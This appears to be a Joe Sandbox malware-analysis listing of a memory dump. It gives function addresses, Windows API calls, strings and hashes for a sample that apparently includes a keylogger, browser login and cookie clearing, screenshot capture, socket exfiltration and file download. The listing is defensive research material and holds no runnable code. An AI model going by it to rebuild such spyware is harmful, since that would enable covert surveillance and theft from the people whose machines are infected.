                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteDirectoryFileRemove
                                              • String ID: pth_unenc$xdF
                                              • API String ID: 3325800564-2448381268
                                              • Opcode ID: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                              • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                              • Opcode Fuzzy Hash: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                              • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                              APIs
                                              • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                              • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                              • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: TerminateThread$HookUnhookWindows
                                              • String ID: pth_unenc
                                              • API String ID: 3123878439-4028850238
                                              • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                              • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                              • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                              • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              APIs
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              Strings
                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              APIs
                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                              Strings
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              APIs
                                              • API ID: SystemTimes$Sleep__aulldiv
                                              • String ID:
                                              • API String ID: 188215759-0
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                              • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID:
                                              • API String ID: 2633735394-0
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                              • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                              • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                              • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                              Strings
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              APIs
                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                              • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                              Strings
                                              • API ID: CodeInfoPageValid
                                              • String ID: v%(/
                                              • API String ID: 546120528-2435473048
                                              • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                              • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                              • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                              • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                              APIs
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: __alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 1635606685-2435473048
                                              • Opcode ID: f0de9a60e357a1a516712e43babba682c551c118595bd7d83414f195bca2d99c
                                              • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                              • Opcode Fuzzy Hash: f0de9a60e357a1a516712e43babba682c551c118595bd7d83414f195bca2d99c
                                              • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                              APIs
                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: GdiplusStartupconnectsend
                                              • String ID: ,aF$NG
                                              • API String ID: 1957403310-2168067942
                                              • Opcode ID: 9cccb7b0bfc2cac53569108e4f26632b701b6f2e9fee152654bfbd7a88a4ba82
                                              • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                              • Opcode Fuzzy Hash: 9cccb7b0bfc2cac53569108e4f26632b701b6f2e9fee152654bfbd7a88a4ba82
                                              • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                              APIs
                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Info
                                              • String ID: $v%(/
                                              • API String ID: 1807457897-360872775
                                              • Opcode ID: 049d1e884d4a1415b50025a45b902bc53cedd3f2c6abddabc7966785a218a195
                                              • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                              • Opcode Fuzzy Hash: 049d1e884d4a1415b50025a45b902bc53cedd3f2c6abddabc7966785a218a195
                                              • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004425A0
                                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00442620
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: v%(/
                                              • API String ID: 1834446548-2435473048
                                              • Opcode ID: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                              • Instruction ID: 27c6b2887722bd8dd8fc110c7074932bdcd8c9000dde826a4c26c38167b381c7
                                              • Opcode Fuzzy Hash: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                              • Instruction Fuzzy Hash: 6341E831A00158ABEB20DF14CE80BE977B5EB48304F5585EAF54997241EBB9DDC2CF98
                                              APIs
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                              • String ID: image/jpeg
                                              • API String ID: 1291196975-3785015651
                                              • Opcode ID: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                              • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                              • Opcode Fuzzy Hash: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                              • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                              • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                              • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                              • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                              • GetLastError.KERNEL32(?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B884
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: v%(/
                                              • API String ID: 442123175-2435473048
                                              • Opcode ID: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                              • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                              • Opcode Fuzzy Hash: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                              • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                              • GetLastError.KERNEL32(?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B796
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: v%(/
                                              • API String ID: 442123175-2435473048
                                              • Opcode ID: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                              • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                              • Opcode Fuzzy Hash: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                              • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                              APIs
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                              • String ID: image/png
                                              • API String ID: 1291196975-2966254431
                                              • Opcode ID: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                              • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                              • Opcode Fuzzy Hash: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                              • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-1507639952
                                              • Opcode ID: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                              • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                              • Opcode Fuzzy Hash: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                              • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                              APIs
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc__crt_fast_encode_pointer
                                              • String ID: v%(/
                                              • API String ID: 2279764990-2435473048
                                              • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                              • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                              • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                              • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                              APIs
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: _abort
                                              • String ID: v%($v%(/
                                              • API String ID: 1888311480-2825822838
                                              • Opcode ID: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                              • Instruction ID: 3fe02070f8d2a70cab432f83213559668c8dc8cd07ffd2e3f30c78975cd7cd62
                                              • Opcode Fuzzy Hash: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                              • Instruction Fuzzy Hash: CD113A326207049BEB14AF79EC06B4D7790AB00B20F15402BF90D9B2C2DBB89C408A8C
                                              APIs
                                              • Sleep.KERNEL32 ref: 0041667B
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadFileSleep
                                              • String ID: !D@
                                              • API String ID: 1931167962-604454484
                                              • Opcode ID: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
                                              • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                              • Opcode Fuzzy Hash: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
                                              • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043506F
                                              • ___raise_securityfailure.LIBCMT ref: 00435156
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: v%(/
                                              • API String ID: 3761405300-2435473048
                                              • Opcode ID: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                              • Instruction ID: c499df361ad1c1a9c93393a24c16d6e92e8df025d99686d048565dfc03b89b9f
                                              • Opcode Fuzzy Hash: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                              • Instruction Fuzzy Hash: ED21EDB9520200DBD724DF1DE992A843BA4FB08354F10503AED0C8B7B0E3B569C08F8D
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                              • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                              • Opcode Fuzzy Hash: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                              • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: alarm.wav$hYG
                                              • API String ID: 1174141254-2782910960
                                              • Opcode ID: 36777b58f562ae880fe065173d7388d0cb1aec3caf481dd9519d79c18cec9ee7
                                              • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                              • Opcode Fuzzy Hash: 36777b58f562ae880fe065173d7388d0cb1aec3caf481dd9519d79c18cec9ee7
                                              • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                              APIs
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                              • UnhookWindowsHookEx.USER32 ref: 0040B102
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                              • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                              • Opcode Fuzzy Hash: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                              • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                              APIs
                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String
                                              • String ID: LCMapStringEx$v%(/
                                              • API String ID: 2568140703-460962935
                                              • Opcode ID: aac5d351483de452061b997450265c1da9567a4c5720285b7a7b965a3286f227
                                              • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                              • Opcode Fuzzy Hash: aac5d351483de452061b997450265c1da9567a4c5720285b7a7b965a3286f227
                                              • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                              APIs
